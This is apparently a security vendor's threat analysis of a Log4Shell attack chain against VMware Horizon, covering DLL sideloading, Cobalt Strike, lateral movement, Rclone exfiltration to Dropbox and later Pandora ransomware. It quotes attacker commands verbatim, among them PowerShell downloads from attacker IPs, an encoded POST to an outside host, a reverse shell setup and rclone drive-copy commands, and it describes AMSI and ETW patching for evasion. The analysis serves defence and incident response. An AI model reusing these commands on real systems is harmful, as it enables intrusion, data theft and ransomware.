Exploits & Vulnerabilities
Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware
We analysed cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon. Many of these attacks resulted in data being exfiltrated from the infected systems. However, we also found that some of the victims were infected with ransomware days after the data exfiltration.
Trend Micro Research recently analysed several cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon. After investigating the chain of events, we found that many of these attacks resulted in data being exfiltrated from the infected systems. However, we also found that some of the victims were infected with ransomware days after the data exfiltration.
This investigation is related to a recent report from security team Sentinel Labs, which describes a technique used by the LockBit ransomware-as-a-service (RaaS) that takes advantage of a command line utility in VMware. Their investigation showed that through this utility, VMware is susceptible to sideloading DLLs.
We spotted similar behaviour to Sentinel Labs in terms of entry points and sideloading, but the investigation, discussed in this article, focuses on techniques of exfiltration and lateral movement.
Analyzing the attack kill chain
Entry point
The attack starts with exploiting the Log4j vulnerability (called Log4Shell) in VMware Horizon. It then spawns a PowerShell instance to execute commands. The threat actor uses PowerShell commands to discover the victim network, then downloads mfeann.exe, LockDown.DLL, and c0000012.log. Here are the commands:
net group /domain
whoami
c:\windows\system32\naet group /domain
c:\windows\system32\nltest /domain_trusts
c:\windows\system32\naet user StantoDe /domain
c:\windows\system32\naet time /domain
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/mfeann.exe -OutFile C:\users\public\mfeann.exe
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/LockDown.DLL -OutFile C:\users\public\LockDown.DLL
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/c0000012.log -OutFile C:\users\public\c0000012.log
In the cases we analysed, there were different files used to sideload malicious DLLs. The file mfeann.exe is an executable responsible for event creation and logging. It is a legitimate executable, signed by a known security company, but we found that threat actors misused it to sideload a malicious DLL named LockDown.DLL. In another intrusion we analysed, the threat actor downloaded another legitimate executable named VMwareXferlog.exe and used the same technique to sideload the malicious DLL glib-2.0.DLL.
See the actions below:
Invoke-WebRequest -uri http://45.61.139.38/VMwareXferlogs.exe -OutFile c:\programdata\VMwareXferlogs.exe;
Invoke-WebRequest -uri http://45.61.139.38/glib-2.0.DLL -OutFile c:\programdata\glib-2.0.DLL;
Invoke-WebRequest -uri http://45.61.139.38/vmtools.ini -OutFile c:\programdata\vmtools.ini
The figure below shows the VMware Horizon Log4j exploitation, then the next step of downloading the VMware utility and malicious DLL via PowerShell (VMwareXferlog.exe and glib-2.0.DLL).
Details of the DLL sideloading
Sideloading happens after the steps described earlier — the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log.
Mfeann.exe is executed, an action which calls the LockDownProtectProcessById function from LockDown.DLL. Then, the execution flows to the malicious payload inside LockDown.DLL. This is the process:
powershell -c curl -uri hxxp://45[.]61.137.57:80 -met POST -Body
([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((C:\users\public\mfeann.exe)))))
The weaponized DLL checks for the presence of a debugger and tries to bypass managed detection and response (MDR) and Microsoft's Antimalware Scan Interface (AMSI) detection. It then decrypts c0000012.log, resulting in a CobaltStrike payload (Sentinel Labs analysed this in detail).
Here is a detailed sequence of actions:
1. The anti-debugging technique checks the BeingDebugged flag inside the PEB structure.
2. Next, the process tries to bypass AMSI and Microsoft event tracking. The loader attempts to evade detection in Event Tracing for Windows (ETW) and AMSI by patching EtwEventWrite and AmsiScanBuffer APIs with return from procedure (RET) instruction. The following function is used to patch both EtwEventWrite and AmsiScanBuffer:
Figures 7 and 8 show EtwEventWrite before and after patching.
3. Finally, the loader starts to map the encrypted CobaltStrike payload, decrypt, and load it.
Investigating notable techniques and tools
Identical loaders
In the intrusions that used mfeann.exe along with LockDown.DLL, or VMwareXferlog.exe with glib-2.0.DLL, both loaders were almost identical.
Persistence
We also observed that the spawned WerFault.exe accessed lsass.exe, and this indicates that credentials might have been dumped. Also, the threat actor utilised existing accounts by adding them to the domain admin group so they can blend in with the environment.
Lateral movement to machines in the network
After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload/downloading files, and more. In this case, the tool is used to provide a reverse shell to threat actors on IP: 45[.]32.108.54 on port 80.
After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines.
Data exfiltration
In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool may upload to different IPs over time:
162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)
CLI command:
cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007856.0151849 2>&1
In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe.
Medias.exe copy '\\[Private IP] \G$' dropbox:ag -q --ignore-existing --max-age 2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors --exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}"
After data exfiltration
In most of the analysed intrusions, we saw the threat actors stopping after the data exfiltration phase. However, in one instance, we observed a Pandora ransomware infection 10 days after the data was exfiltrated.
The sequence of events was as follows: First, the stowaway hacking tool was dropped after the malicious DLL is sideloaded via VMwareXferlog.exe utility. Then, the Rclone tool (update.exe) was dropped and used for exfiltration. Ten days later, we detected Pandora ransomware on the machine.
Attack stages
We suspect that because there was a long period between exfiltration and ransomware infection, there are threat actors who sell access to ransomware groups after exfiltrating data. Selling access is nothing new in the underground — once one threat actor is finished with their malicious activities, they can sell their entry point to victims’ networks to other threat groups.
Latest observed loader
While hunting for loaders similar to LockDown.DLL and glib-2.0.DLL, we found a similar loader that was submitted to Virus Total on June 22. The loader uses the mfeann.exe ligament tool to sideload a malicious LockDown.dll. The observed sample was dropped in a way that differs from the Log4j exploit — this one was dropped via the.Net trojan “UnLockApps.exe.”
The trojan dropped three files at the location %appdata% \MfeannP1ugins:
- mfeann.exe: A ligament tool that sideloads the malicious LockDown.dll
- LockDown.dll: A malicious DLL
- avupdate_msg.avr: The encrypted cobalt strike payload
Although this LockDown.dll sample was created recently (June 5, 2022) it doesn’t appear to be as complex as the older sample included in the previous sections. It does not check the debugger environment or bypass security monitoring solutions.
This sample has the same main functionality as the previous one that loads an encrypted file and then decrypts it, resulting in a Cobalt string payload.
Security Solutions
A multilayered approach can help organisations defend against this and other ransomware attacks using security technologies that can detect malicious components and suspicious behaviour.
- Trend Micro Vision One™ provides multilayered protection and behaviour detection, which helps block suspicious behaviour and tools before the ransomware can do any damage.
- Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
- Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
- Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.
For a complete list of the Indicators of Compromise, please download this document.
MITRE ATT&CK